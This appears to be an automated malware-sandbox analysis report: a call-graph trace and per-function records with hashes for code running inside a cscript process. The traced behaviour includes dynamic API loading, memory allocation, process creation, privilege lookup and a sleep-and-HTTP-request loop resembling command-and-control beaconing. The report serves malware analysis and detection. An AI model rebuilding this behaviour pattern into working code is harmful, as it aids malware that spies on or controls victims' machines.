21a4751 92166->92167 92222 21abfd0 92167->92222 92169 21a475c 92169->92120 92171 21a445b 92170->92171 92172 21a448e 92170->92172 92173 21aa2e0 LdrLoadDll 92171->92173 92174 21a45d9 92172->92174 92178 21a44aa 92172->92178 92175 21a4476 92173->92175 92176 21aa2e0 LdrLoadDll 92174->92176 92177 21aa490 2 API calls 92175->92177 92182 21a45f4 92176->92182 92179 21a447f 92177->92179 92180 21aa2e0 LdrLoadDll 92178->92180 92179->92123 92181 21a44c5 92180->92181 92184 21a44cc 92181->92184 92185 21a44e1 92181->92185 92240 21aa320 LdrLoadDll 92182->92240 92187 21aa490 2 API calls 92184->92187 92188 21a44fc 92185->92188 92189 21a44e6 92185->92189 92186 21a462e 92190 21aa490 2 API calls 92186->92190 92191 21a44d5 92187->92191 92197 21a4501 92188->92197 92228 21abf90 92188->92228 92192 21aa490 2 API calls 92189->92192 92194 21a4639 92190->92194 92191->92123 92193 21a44ef 92192->92193 92193->92123 92194->92123 92205 21a4513 92197->92205 92231 21aa410 92197->92231 92198 21a4567 92199 21a457e 92198->92199 92239 21aa2a0 LdrLoadDll 92198->92239 92200 21a459a 92199->92200 92201 21a4585 92199->92201 92204 21aa490 2 API calls 92200->92204 92203 21aa490 2 API calls 92201->92203 92203->92205 92206 21a45a3 92204->92206 92205->92123 92207 21a45cf 92206->92207 92234 21abb90 92206->92234 92207->92123 92209 21a45ba 92210 21abdc0 2 API calls 92209->92210 92211 21a45c3 92210->92211 92211->92123 92212->92095 92213->92116 92215 21aaf60 LdrLoadDll 92214->92215 92216 21a4d14 92215->92216 92217 21aa320 LdrLoadDll 92216->92217 92217->92119 92219 21aaf60 LdrLoadDll 92218->92219 92220 21aa4ac NtClose 92219->92220 92220->92124 92221->92104 92225 21aa630 92222->92225 92224 21abfea 92224->92169 92226 21aaf60 LdrLoadDll 92225->92226 92227 21aa64c RtlAllocateHeap 92226->92227 92227->92224 92229 21aa630 2 API calls 92228->92229 92230 21abfa8 92229->92230 92230->92197 92232 21aaf60 LdrLoadDll 92231->92232 92233 21aa42c NtReadFile 92232->92233 92233->92198 92235 21abb9d 92234->92235 92236 21abbb4 92234->92236 92235->92236 92237 21abf90 2 API calls 92235->92237 92236->92209 92238 21abbcb 92237->92238 92238->92209 92239->92199 92240->92186 92242 21abd6d 92241->92242 92371 21aa540 92241->92371 92242->92129 92245 21a4081 92244->92245 92246 21a4089 92244->92246 92245->92132 92275 21a435c 92246->92275 92374 21acf30 92246->92374 92248 21a40dd 92249 21acf30 2 API calls 92248->92249 92253 21a40e8 92249->92253 92250 21a4136 92252 21acf30 2 API calls 92250->92252 92256 21a414a 92252->92256 92253->92250 92254 21ad060 3 API calls 92253->92254 92388 21acfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 92253->92388 92254->92253 92255 21a41a7 92257 21acf30 2 API calls 92255->92257 92256->92255 92379 21ad060 92256->92379 92259 21a41bd 92257->92259 92260 21a41fa 92259->92260 92262 21ad060 3 API calls 92259->92262 92261 21acf30 2 API calls 92260->92261 92263 21a4205 92261->92263 92262->92259 92264 21ad060 3 API calls 92263->92264 92267 21a423f 92263->92267 92264->92263 92385 21acf90 92267->92385 92268 21acf90 2 API calls 92269 21a433e 92268->92269 92270 21acf90 2 API calls 92269->92270 92271 21a4348 92270->92271 92272 21acf90 2 API calls 92271->92272 92273 21a4352 92272->92273 92274 21acf90 2 API calls 92273->92274 92274->92275 92275->92132 92277 21a53a1 92276->92277 92278 21a4a50 8 API calls 92277->92278 92280 21a53b7 92278->92280 92279 21a540a 92279->92135 92280->92279 92281 21a53f2 92280->92281 92282 21a5405 92280->92282 92284 21abdc0 2 API calls 92281->92284 92283 21abdc0 2 API calls 92282->92283 92283->92279 92285 21a53f7 92284->92285 92285->92135 92389 21aac30 92286->92389 92289 21aac30 LdrLoadDll 92290 21aad8d 92289->92290 92291 21aac30 LdrLoadDll 92290->92291 92292 21aad96 92291->92292 92293 21aac30 LdrLoadDll 92292->92293 92294 21aad9f 92293->92294 92295 21aac30 LdrLoadDll 92294->92295 92296 21aada8 92295->92296 92297 21aac30 LdrLoadDll 92296->92297 92298 21aadb1 92297->92298 92299 21aac30 LdrLoadDll 92298->92299 92300 21aadbd 92299->92300 92301 21aac30 LdrLoadDll 92300->92301 92302 21aadc6 92301->92302 92303 21aac30 LdrLoadDll 92302->92303 92304 21aadcf 92303->92304 92305 21aac30 LdrLoadDll 92304->92305 92306 21aadd8 92305->92306 92307 21aac30 LdrLoadDll 92306->92307 92308 21aade1 92307->92308 92309 21aac30 LdrLoadDll 92308->92309 92310 21aadea 92309->92310 92311 21aac30 LdrLoadDll 92310->92311 92312 21aadf6 92311->92312 92313 21aac30 LdrLoadDll 92312->92313 92314 21aadff 92313->92314 92315 21aac30 LdrLoadDll 92314->92315 92316 21aae08 92315->92316 92317 21aac30 LdrLoadDll 92316->92317 92318 21aae11 92317->92318 92319 21aac30 LdrLoadDll 92318->92319 92320 21aae1a 92319->92320 92321 21aac30 LdrLoadDll 92320->92321 92322 21aae23 92321->92322 92323 21aac30 LdrLoadDll 92322->92323 92324 21aae2f 92323->92324 92325 21aac30 LdrLoadDll 92324->92325 92326 21aae38 92325->92326 92327 21aac30 LdrLoadDll 92326->92327 92328 21aae41 92327->92328 92329 21aac30 LdrLoadDll 92328->92329 92330 21aae4a 92329->92330 92331 21aac30 LdrLoadDll 92330->92331 92332 21aae53 92331->92332 92333 21aac30 LdrLoadDll 92332->92333 92334 21aae5c 92333->92334 92335 21aac30 LdrLoadDll 92334->92335 92336 21aae68 92335->92336 92337 21aac30 LdrLoadDll 92336->92337 92338 21aae71 92337->92338 92339 21aac30 LdrLoadDll 92338->92339 92340 21aae7a 92339->92340 92341 21aac30 LdrLoadDll 92340->92341 92342 21aae83 92341->92342 92343 21aac30 LdrLoadDll 92342->92343 92344 21aae8c 92343->92344 92345 21aac30 LdrLoadDll 92344->92345 92346 21aae95 92345->92346 92347 21aac30 LdrLoadDll 92346->92347 92348 21aaea1 92347->92348 92349 21aac30 LdrLoadDll 92348->92349 92350 21aaeaa 92349->92350 92351 21aac30 LdrLoadDll 92350->92351 92352 21aaeb3 92351->92352 92353 21aac30 LdrLoadDll 92352->92353 92354 21aaebc 92353->92354 92355 21aac30 LdrLoadDll 92354->92355 92356 21aaec5 92355->92356 92357 21aac30 LdrLoadDll 92356->92357 92358 21aaece 92357->92358 92359 21aac30 LdrLoadDll 92358->92359 92360 21aaeda 92359->92360 92361 21aac30 LdrLoadDll 92360->92361 92362 21aaee3 92361->92362 92363 21aac30 LdrLoadDll 92362->92363 92364 21aaeec 92363->92364 92364->92140 92366 21aaf60 LdrLoadDll 92365->92366 92367 21a9edc 92366->92367 92395 4692d10 LdrInitializeThunk 92367->92395 92368 21a9ef3 92368->92061 92370->92138 92372 21aa55c NtAllocateVirtualMemory 92371->92372 92373 21aaf60 LdrLoadDll 92371->92373 92372->92242 92373->92372 92375 21acf40 92374->92375 92376 21acf46 92374->92376 92375->92248 92377 21abf90 2 API calls 92376->92377 92378 21acf6c 92377->92378 92378->92248 92380 21acfd0 92379->92380 92381 21abf90 2 API calls 92380->92381 92382 21ad02d 92380->92382 92383 21ad00a 92381->92383 92382->92256 92384 21abdc0 2 API calls 92383->92384 92384->92382 92386 21abdc0 2 API calls 92385->92386 92387 21a4334 92386->92387 92387->92268 92388->92253 92390 21aac4b 92389->92390 92391 21a4e50 LdrLoadDll 92390->92391 92392 21aac6b 92391->92392 92393 21a4e50 LdrLoadDll 92392->92393 92394 21aad17 92392->92394 92393->92394 92394->92289 92395->92368 92397 4692b3f LdrInitializeThunk 92396->92397 92398 4692b31 92396->92398 92397->92146 92398->92146 92400 21aaf60 LdrLoadDll 92399->92400 92401 21aa68c RtlFreeHeap 92400->92401 92401->92150 92403 2197eab 92402->92403 92404 2197eb0 92402->92404 92403->92069 92405 21abd40 2 API calls 92404->92405 92411 2197ed5 92405->92411 92406 2197f38 92406->92069 92407 21a9ec0 2 API calls 92407->92411 92408 2197f3e 92410 2197f64 92408->92410 92412 21aa5c0 2 API calls 92408->92412 92410->92069 92411->92406 92411->92407 92411->92408 92413 21abd40 2 API calls 92411->92413 92418 21aa5c0 92411->92418 92414 2197f55 92412->92414 92413->92411 92414->92069 92416 21aa5c0 2 API calls 92415->92416 92417 219817e 92416->92417 92417->92026 92419 21aa5dc 92418->92419 92420 21aaf60 LdrLoadDll 92418->92420 92423 4692b90 LdrInitializeThunk 92419->92423 92420->92419 92421 21aa5f3 92421->92411 92423->92421 92425 21ab5c3 92424->92425 92428 219acf0 92425->92428 92429 219ad14 92428->92429 92430 219ad50 LdrLoadDll 92429->92430 92431 2199c4a 92429->92431 92430->92431 92431->92032 92434 219b063 92432->92434 92433 219b0e0 92433->92039 92434->92433 92447 21a9c90 LdrLoadDll 92434->92447 92437 21aaf60 LdrLoadDll 92436->92437 92438 219f1bb 92437->92438 92438->92041 92439 21aa7d0 92438->92439 92440 21aaf60 LdrLoadDll 92439->92440 92441 21aa7ef LookupPrivilegeValueW 92440->92441 92441->92044 92443 21aaf60 LdrLoadDll 92442->92443 92444 21aa27c 92443->92444 92448 4692dc0 LdrInitializeThunk 92444->92448 92445 21aa29b 92445->92045 92447->92433 92448->92445 92450 219b1f0 92449->92450 92451 219b040 LdrLoadDll 92450->92451 92452 219b204 92451->92452 92452->91979 92454 219af34 92453->92454 92526 21a9c90 LdrLoadDll 92454->92526 92456 219af6e 92456->91981 92458 219f3ac 92457->92458 92459 219b1c0 LdrLoadDll 92458->92459 92460 219f3be 92459->92460 92527 219f290 92460->92527 92463 219f3d9 92465 21aa490 2 API calls 92463->92465 92467 219f3e4 92463->92467 92464 219f3f1 92466 21aa490 2 API calls 92464->92466 92468 219f402 92464->92468 92465->92467 92466->92468 92467->91984 92468->91984 92470 219f43c 92469->92470 92546 219b2b0 92470->92546 92472 219f44e 92473 219f290 3 API calls 92472->92473 92474 219f45f 92473->92474 92475 219f469 92474->92475 92476 219f481 92474->92476 92477 219f474 92475->92477 92479 21aa490 2 API calls 92475->92479 92478 219f492 92476->92478 92480 21aa490 2 API calls 92476->92480 92477->91986 92478->91986 92479->92477 92480->92478 92482 219caa6 92481->92482 92483 219cab0 92481->92483 92482->91995 92484 219af10 LdrLoadDll 92483->92484 92485 219cb4e 92484->92485 92486 219cb74 92485->92486 92487 219b040 LdrLoadDll 92485->92487 92486->91995 92488 219cb90 92487->92488 92489 21a4a50 8 API calls 92488->92489 92490 219cbe5 92489->92490 92490->91995 92492 219d646 92491->92492 92493 219b040 LdrLoadDll 92492->92493 92494 219d65a 92493->92494 92550 219d310 92494->92550 92496 219908b 92497 219cc00 92496->92497 92498 219cc26 92497->92498 92499 219b040 LdrLoadDll 92498->92499 92500 219cca9 92498->92500 92499->92500 92501 219b040 LdrLoadDll 92500->92501 92502 219cd16 92501->92502 92503 219af10 LdrLoadDll 92502->92503 92504 219cd7f 92503->92504 92505 219b040 LdrLoadDll 92504->92505 92506 219ce2f 92505->92506 92506->92008 92509 2198d14 92507->92509 92579 219f6d0 92507->92579 92510 2198f25 92509->92510 92584 21a43a0 92509->92584 92510->91966 92512 2198d70 92512->92510 92587 2198ab0 92512->92587 92515 21acf30 2 API calls 92516 2198db2 92515->92516 92517 21ad060 3 API calls 92516->92517 92521 2198dc7 92517->92521 92518 2197ea0 4 API calls 92518->92521 92521->92510 92521->92518 92522 219c7b0 18 API calls 92521->92522 92523 2198160 2 API calls 92521->92523 92592 219f670 92521->92592 92596 219f080 21 API calls 92521->92596 92522->92521 92523->92521 92524->91988 92525->92005 92526->92456 92528 219f2aa 92527->92528 92536 219f360 92527->92536 92529 219b040 LdrLoadDll 92528->92529 92530 219f2cc 92529->92530 92537 21a9f40 92530->92537 92532 219f30e 92540 21a9f80 92532->92540 92535 21aa490 2 API calls 92535->92536 92536->92463 92536->92464 92538 21aaf60 LdrLoadDll 92537->92538 92539 21a9f5c 92538->92539 92539->92532 92541 21aaf60 LdrLoadDll 92540->92541 92542 21a9f9c 92541->92542 92545 46934e0 LdrInitializeThunk 92542->92545 92543 219f354 92543->92535 92545->92543 92547 219b2d7 92546->92547 92548 219b040 LdrLoadDll 92547->92548 92549 219b313 92548->92549 92549->92472 92551 219d327 92550->92551 92559 219f710 92551->92559 92555 219d39b 92556 219d3a2 92555->92556 92570 21aa2a0 LdrLoadDll 92555->92570 92556->92496 92558 219d3b5 92558->92496 92560 219f735 92559->92560 92571 21981a0 92560->92571 92562 219d36f 92567 21aa6e0 92562->92567 92563 21a4a50 8 API calls 92565 219f759 92563->92565 92565->92562 92565->92563 92566 21abdc0 2 API calls 92565->92566 92578 219f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 92565->92578 92566->92565 92568 21aa6ff CreateProcessInternalW 92567->92568 92569 21aaf60 LdrLoadDll 92567->92569 92568->92555 92569->92568 92570->92558 92572 219829f 92571->92572 92573 21981b5 92571->92573 92572->92565 92573->92572 92574 21a4a50 8 API calls 92573->92574 92575 2198222 92574->92575 92576 21abdc0 2 API calls 92575->92576 92577 2198249 92575->92577 92576->92577 92577->92565 92578->92565 92580 21a4e50 LdrLoadDll 92579->92580 92581 219f6ef 92580->92581 92582 219f6fd 92581->92582 92583 219f6f6 SetErrorMode 92581->92583 92582->92509 92583->92582 92597 219f4a0 92584->92597 92586 21a43c6 92586->92512 92588 21abd40 2 API calls 92587->92588 92591 2198ad5 92588->92591 92589 2198cea 92589->92515 92591->92589 92616 21a9880 92591->92616 92593 219f683 92592->92593 92664 21a9e90 92593->92664 92596->92521 92598 219f4bd 92597->92598 92604 21a9fc0 92598->92604 92601 219f505 92601->92586 92605 21a9fdc 92604->92605 92606 21aaf60 LdrLoadDll 92604->92606 92614 4692e50 LdrInitializeThunk 92605->92614 92606->92605 92607 219f4fe 92607->92601 92609 21aa010 92607->92609 92610 21aaf60 LdrLoadDll 92609->92610 92611 21aa02c 92610->92611 92615 4692c30 LdrInitializeThunk 92611->92615 92612 219f52e 92612->92586 92614->92607 92615->92612 92617 21abf90 2 API calls 92616->92617 92618 21a9897 92617->92618 92637 2199310 92618->92637 92620 21a98b2 92621 21a98d9 92620->92621 92622 21a98f0 92620->92622 92623 21abdc0 2 API calls 92621->92623 92625 21abd40 2 API calls 92622->92625 92624 21a98e6 92623->92624 92624->92589 92626 21a992a 92625->92626 92627 21abd40 2 API calls 92626->92627 92629 21a9943 92627->92629 92634 21a9be4 92629->92634 92643 21abd80 LdrLoadDll 92629->92643 92630 21a9bc9 92631 21a9bd0 92630->92631 92630->92634 92632 21abdc0 2 API calls 92631->92632 92633 21a9bda 92632->92633 92633->92589 92635 21abdc0 2 API calls 92634->92635 92636 21a9c39 92635->92636 92636->92589 92638 2199335 92637->92638 92639 219acf0 LdrLoadDll 92638->92639 92640 2199368 92639->92640 92642 219938d 92640->92642 92644 219cf20 92640->92644 92642->92620 92643->92630 92645 219cf4c 92644->92645 92646 21aa1e0 LdrLoadDll 92645->92646 92647 219cf65 92646->92647 92648 219cf6c 92647->92648 92655 21aa220 92647->92655 92648->92642 92652 219cfa7 92653 21aa490 2 API calls 92652->92653 92654 219cfca 92653->92654 92654->92642 92656 21aa23c 92655->92656 92657 21aaf60 LdrLoadDll 92655->92657 92663 4692bc0 LdrInitializeThunk 92656->92663 92657->92656 92658 219cf8f 92658->92648 92660 21aa810 92658->92660 92661 21aaf60 LdrLoadDll 92660->92661 92662 21aa82f 92661->92662 92662->92652 92663->92658 92665 21aaf60 LdrLoadDll 92664->92665 92666 21a9eac 92665->92666 92669 4692cf0 LdrInitializeThunk 92666->92669 92667 219f6ae 92667->92521 92669->92667 92672 46929f0 LdrInitializeThunk 92674 21a9080 92675 21abd40 2 API calls 92674->92675 92677 21a90bb 92675->92677 92676 21a919c 92677->92676 92678 219acf0 LdrLoadDll 92677->92678 92679 21a90f1 92678->92679 92680 21a4e50 LdrLoadDll 92679->92680 92682 21a910d 92680->92682 92681 21a9120 Sleep 92681->92682 92682->92676 92682->92681 92685 21a8ca0 92682->92685 92707 21a8eb0 LdrLoadDll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA 92682->92707 92686 21a8cc5 92685->92686 92688 21a8d1f 92686->92688 92708 21aa980 92686->92708 92702 21a8e83 92688->92702 92713 21aa9f0 92688->92713 92690 21a8d60 92690->92702 92718 21aaa70 92690->92718 92692 21a8d8d 92693 21a8d96 92692->92693 92694 21a8da7 92692->92694 92728 21aabd0 LdrLoadDll 92693->92728 92723 21aaaf0 92694->92723 92697 21a8d9d 92697->92682 92698 21a8e69 92731 21aabd0 LdrLoadDll 92698->92731 92700 21a8e7c 92732 21aabd0 LdrLoadDll 92700->92732 92702->92682 92704 21a8db6 92704->92698 92729 21aab60 LdrLoadDll 92704->92729 92705 21a8e36 92705->92698 92730 21aab60 LdrLoadDll 92705->92730 92707->92682 92709 21aa9ba 92708->92709 92733 21ab010 92708->92733 92711 21aa9de 92709->92711 92712 21aa9c3 InternetOpenA 92709->92712 92711->92688 92712->92688 92714 21ab010 LdrLoadDll 92713->92714 92715 21aaa2f 92714->92715 92716 21aaa38 InternetConnectA 92715->92716 92717 21aaa5f 92715->92717 92716->92690 92717->92690 92719 21ab010 LdrLoadDll 92718->92719 92720 21aaaaf 92719->92720 92721 21aaab8 HttpOpenRequestA 92720->92721 92722 21aaadf 92720->92722 92721->92692 92722->92692 92724 21ab010 LdrLoadDll 92723->92724 92725 21aab2f 92724->92725 92726 21aab38 HttpSendRequestA 92725->92726 92727 21aab53 92725->92727 92726->92704 92727->92704 92728->92697 92729->92705 92730->92705 92731->92700 92732->92702 92734 21ab01c 92733->92734 92735 21ab031 92733->92735 92736 21a4e50 LdrLoadDll 92734->92736 92735->92709 92736->92735

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 423 21aa360-21aa3b1 call 21aaf60 NtCreateFile
                                                                                                                                      APIs
                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,021A4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,021A4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 021AA3AD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID: .z`
                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                      • Instruction ID: b72aa6b4d2807efd49b222fabe0067d14765b65f6151f3b2ec39c5062bdae810
                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                      • Instruction Fuzzy Hash: 7FF0BDB2200208AFCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 426 21aa53a-21aa57d call 21aaf60 NtAllocateVirtualMemory
                                                                                                                                      APIs
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02192D11,00002000,00003000,00000004), ref: 021AA579
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                      • String ID: U
                                                                                                                                      • API String ID: 2167126740-3372436214
                                                                                                                                      • Opcode ID: 49568251c8b239eb70900aa0ff838adf82063e56f60fe6115102c6a3cc50adec
                                                                                                                                      • Instruction ID: f23133d7cd783bed06c1935f4a6a39bbdbd2e337e30ff4d27ab56bc3b7f07370
                                                                                                                                      • Opcode Fuzzy Hash: 49568251c8b239eb70900aa0ff838adf82063e56f60fe6115102c6a3cc50adec
                                                                                                                                      • Instruction Fuzzy Hash: 77F0F8B6200208AFCB18DF88CC81EEB77B9EF88754F118148FA1997241C630E911CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • NtReadFile.NTDLL(021A4D72,5EB65239,FFFFFFFF,021A4A31,?,?,021A4D72,?,021A4A31,FFFFFFFF,5EB65239,021A4D72,?,00000000), ref: 021AA455
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                      • Instruction ID: b603ce1e0a9d4e0a1dd5b6e18b7d9c026cab5592f033d8a7ba2a2b15e7f78624
                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                      • Instruction Fuzzy Hash: CDF0B7B6200208AFCB18DF99DC90EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02192D11,00002000,00003000,00000004), ref: 021AA579
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                      • Instruction ID: cf1c2beea496dc433256654194f30790f21080b291b03800b20b3919884e031f
                                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                      • Instruction Fuzzy Hash: CEF015B6200208AFCB18DF89CC80EAB77ADEF88754F118148BE0897241C630F810CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • NtClose.NTDLL(021A4D50,?,?,021A4D50,00000000,FFFFFFFF), ref: 021AA4B5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                      • Instruction ID: 40d9a86f91e42103a2d73a4ab97e25ad08f1744524982cf0de2e456cf3cb8112
                                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                      • Instruction Fuzzy Hash: 88D012762402146BD714EB98CC45E97776DEF44750F154455BA185B241C530F50086E0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 82df7a02770bbe8c6a8a6db72456eceec219997848ac17338ebd80920db724c7
                                                                                                                                      • Instruction ID: 539fed9f9fc3bb93284258650aba7d2e086b53fc83cbaa5962e457db34818520
                                                                                                                                      • Opcode Fuzzy Hash: 82df7a02770bbe8c6a8a6db72456eceec219997848ac17338ebd80920db724c7
                                                                                                                                      • Instruction Fuzzy Hash: 0690022961350002F6847558550860A000587D1246F91D819A0016658CDD25DC796722
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 0f39dd2cb65db084d36763ccd841bb61d30e250ace80fd78a1ceab440a531a6b
                                                                                                                                      • Instruction ID: 2dd910edef0fa7085e4f760e8900db8430a8679007bd6a197333c0f039105287
                                                                                                                                      • Opcode Fuzzy Hash: 0f39dd2cb65db084d36763ccd841bb61d30e250ace80fd78a1ceab440a531a6b
                                                                                                                                      • Instruction Fuzzy Hash: 3D900221642541527A49B5584504507400697E0285791C416A1415A50CD936EC66EA22
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: d9aa7abb86a127b65cdfe1f919310747a68282b9c611ffdd622b176d4868709d
                                                                                                                                      • Instruction ID: aa47fc46b9b905d22c259836047ffde6f48d1cd07d8b22f6b8403378b4b3565a
                                                                                                                                      • Opcode Fuzzy Hash: d9aa7abb86a127b65cdfe1f919310747a68282b9c611ffdd622b176d4868709d
                                                                                                                                      • Instruction Fuzzy Hash: E790023160150413F61575584604707000987D0285F91C816A0425658DEA66DD62B522
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 4c321aeee7eed84851713fa26408c2b065cdf5ce173d0036f5585918184f8709
                                                                                                                                      • Instruction ID: 84a4d9e1534a93953bd29cbf6ada6a8b36076db80f9bdff3f528d3d6f5646d43
                                                                                                                                      • Opcode Fuzzy Hash: 4c321aeee7eed84851713fa26408c2b065cdf5ce173d0036f5585918184f8709
                                                                                                                                      • Instruction Fuzzy Hash: C090027160150402F64475584504746000587D0345F51C415A5065654EDA69DDE57A66
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
